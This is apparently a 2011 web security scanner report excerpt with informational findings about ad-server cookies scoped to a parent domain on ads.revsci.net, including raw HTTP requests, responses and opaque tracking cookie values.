Set-Cookie:PRpc=|FOGiGJX6:1|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
8.11. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=G07610 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qbvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qbvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ACkx="MLsXrrEOpxpv55C28tahZ2a57v4BlBm9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8mSRjjy362Kg9l9j12Gne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMrZomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3R12PP1jsIeQESkSCfQd2Rv5bmkvNXim0YaZH/oAOOvyT6fStPkv2uQ2x+zJxYCKJ380tO/7NDk1Cr5CLsePblwe5CaZKtk2cnHN4ypKxHQnUA9nMhOh40Y7eWFEyF/1pBhtUOQIGM4FNshy/r9uoVanI7S9wjsu7cQ2GLx6klsw3fKG0LRYXJoO8BPzDZ0Ad33A1LcxSZSjelmPU0uZlBQGDTldAMhtSq/qB4zDVsHhTVoKMi95sLa1jCxlwUg6T1ZO+HYWDOHTJi0LagESEUnsxiWBCBRgmQyURk897T7pkrz3dKGIro6ZFXf3ae2gPfbIofOF6NRrU4YRy5dGJW9NAt4MjjIm7I43pxxByrZTLL+GxbsmE0GBWRWZCbjkRjImDMKhEfiDy0yW6Z5o0xJi8Hzv55UNwWyqDPr6NsUVX3YRZbHuTmBme3eL1fD8vlNhdDdAEiymTDg8ZDFZXYXg+4eCCvGtmB78iT2s7h74g2pbMFW87TZUUhX+5uIlcTjarrYWFiJBg0T3kdyCIGgb6VinZVNHl8zMbgIvbN5HvSVqXJ4f2pxG6cNzTKqp3zAXN3y6Z5dLC4za278TMyvj3EaA+9GXL5Q3umhZ5iKvOL2MQN1FszweH5kHDsnZBw7FHK1W7K9ytiQlKyGwRcFvx0ruvYvIXmj+tAMIIPGAQmI8DhNchCSNHQB76PtPXrdccpA2pXLl9bFALdy6Cloe92PzExfrDPCyXYizoO35nHHt261b7BNW7mlXu4HE+RMzKp/w3DDxq3P51FqfLazcKXAKo+k+eUMiKBhuDeHmNx9gxE+tMHBDvefXEaobba8kIG/d3ZnetS0v143+v9cRjC8vrdgFjuw2njlOJAK+4WiUjbkg3cvNuLBQHQuJCFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsa2pHs2QyHQZ7oMFPBS4AswOxs1D85HD16/Fs0sx4LRf45JIP1RkCzIJQobpFDEpAzLn+iKiRZ/8fN46Tpo9vq/IhDfZco4Dvnz7Lk6YL2cECgE1wTPIX+rntGoV7Pz3CBVtMpYG9UnxmrqVza894dY842yruwTSp5/c0eWxjWvuha7gOZlZwngerodWjVjvQarZNPef5tKXMGB5hB32jgtGEA0EgYnGf6WvcsHUS67HvafQdkBQoClqw23HwnnAnjxdCEbZ1TWfb1B4rNU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ylDPxYY7RUCe6kEnJeDmFfDpj6Di1CrYq+kINMQgTDBTrooc7usfixoqIdj/1E4CcIAVs189WsefoulfV2+/Fr7fw2QgdF9a0bLVdVCmUU0nA+HlcLT5zMatL70T/uRPKfhehDnmFwEfmtC1NFoZLDs99p4lm6IfMHeHwGHaC/T2SCtvlwJavWhcO6eYD0bQA1Hb4bCQGm3tRSMoKP/qlF6nf5vZ6qe5ZApKFNQySD1x+Imd5A4HTACBAaI8aNf/8O/Do+G/ujoZcUcxVJ7WKAv3L7uWPOTJINcWCI/zihYP3LqEsKxFusDUM+4Ictn+nscAVeiLA1VCvN4hoswjisKJYHkzSA5sJQ8D9lhymHaYGtPLmPE/DihgbpTTV6ZxAZQj0L7DdP1xVluU9pWlBCTCvaUljU7N3JrwOEaC6Guif9KFb3mkC1RuSY9jUIEKUGfoM36ZXfsUiewEjC0csUDllT2Ke6/7aDzQHxRrWF5PKtcdzQOLu0YkFOun5yE+VA0C0cU1Oy4LShOLzDh0+Y7z7WrqjfyaJPuccYQD7TePGOkimvBWYpr5L/v/QyizoH9meVTWi6dRzhN0m1heyLXklt5fGolHapV9oeLHM7xjsUlCqx25M8/TSXbOxRcB9wuo4mkx54fr3uZ5+IztDaJPZZrnjmdq2wTbqAnFM26pu7ZNroTeytAhwo7Mi8bkixlmX5tOZxA0YhXMy8F8uBV3KugjxyrMJwHyL6x+Nblik54TVfC7rPoaGGR43dnWTo/6WSxy/Q7pj2OuYQ+9dW8p/thpb3uDDrU2n1wgGqtUfiuDu0d8NZEnIHyx1xoZ7Ylsyr/zUhY9J9E2Y5+FKeLCPynmSO2JAPqyQoYOu8FGoKrega/u2oRX/OfXTIey3FuMGXvqHUCssSKvCRTsk7Ovn59on47gEK/Td4toCcsKdS9uYCFjSH2lDfycy2EBbgygNj9+viTUeQEr3J3ZCcKo+AfTPML120i8JoY1++jP2G1Wusiz6de2/ptcZ7nQrnuZIoigTnogy4x113ZhngplXswlPKGYpQwJSP+P8bvxeDHIjttT1E+qm6PcLam1zhbejeX7OSy2qJm++xUANxHgutR5ZXiYpxPSFZLfcICJ5L7laPyr157CRWJbCK8H6vrfcy2f/o13YfRFaEHY3DpHtoSjfuFRDFtsVGeFT8ZaK944kAnpumATg7EBF6iVt+eIKekOV3AMhh3HKj7pVmX7BNqICrqBeEuj78bNVsXfmbNWi+Os/PNpEGVTEDpLVVi/2347+IXMYA029QAZa1iaHCvuT9BZzN+Yj65kpzwf8uZ6Ucxz0PAULh44X02cLoVPseurv2PwWAaP0eLU+g/EyP8He9td+dZQjGtw7Nh1fDQCo/tsKshlDBAIUW6/sXO9uVGPBDhDb7f5XcKXmqrrwv/yPXMJ546MFRXdseNbk1XpnWu0akcZwnML/AsnkI56S3Iytgm1dkcVYSvrI9EnDw7HxjcpRnJd3JmcF0fxpEzHf8Wl3zzVL4m+u0XYmkrKMgWyWfeUxEdGJlBtjbASzKkYku5fPIeObLSHFOvCGQybWeolrA3ymr5iBVyOS78O3mvlZlRE2EVVUJJ5MtbDmtkU38lS1HhBtdJqRfnQ8S9wBjv+NgSN6HyVKHDBtHcqUAZlgx87FMORzGNMd9H9m0wU+vX/jdOAcNHbe8iYoNM20UTEOvLtXZZ4qz05II60CBtZjglarFbDpzgrCcDNeT/JTi/FjFcW7bMgG5wkCwiBhUSaR7rNX7n9HgkMpE4YnIsPYdxAWsMlLICoMU4smE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:32 GMT
Content-Length: 2449

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
8.12. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715966-1009491-665981-317325-1198035-481602-1096170-74560-1264419-926097-107089-1096152-1063912-1063916-1166710-1063911-1063910-1246035-1246037-1246036-1023315-75921-86237-617983-1201817-1086731-1086733-1284585-124865-641525-1044410-1077940-1093100-613349-1009462-1044578-1041270-1093092-1093093-596293-576685-596292-596291-1044587-1009698-703456-621393-1268392-1049794-1238051-185980-770484-757774-1086373-593881-1215295-1086372-1196055-1086371-1236954-1086370-1086369-1196051-1236953-1236950-1147048-1236951-1049851-1076406-588118-1090723-1215322-1009546-715901-725071-715883-109108-1081817-1224040-1006093-1006089-1009578-1191521-1049785-1092989-1049788-1010298-397181-397180-672502-1010301-1146866-1020427-1049769-1049770-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
